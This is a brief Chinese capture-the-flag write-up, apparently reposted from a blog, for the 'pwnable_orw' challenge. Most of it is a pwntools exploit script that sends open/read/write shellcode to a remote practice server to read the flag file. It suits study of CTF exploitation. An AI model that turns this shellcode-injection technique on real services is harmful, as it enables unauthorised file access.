pwnable_orw

这道题应该是之前做过的…
在这里插入图片描述
在这里插入图片描述
exp

from pwn import *

context(arch='i386', log_level='debug')
p = remote('node3.buuoj.cn', 27912)
payload = asm(shellcraft.open('./flag') + shellcraft.read('eax', 'esp', 0x30) + shellcraft.write(1, 'esp', 0x30))
p.sendafter('shellcode:', payload)
print(p.recv())

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/weixin_43833642/article/details/107170131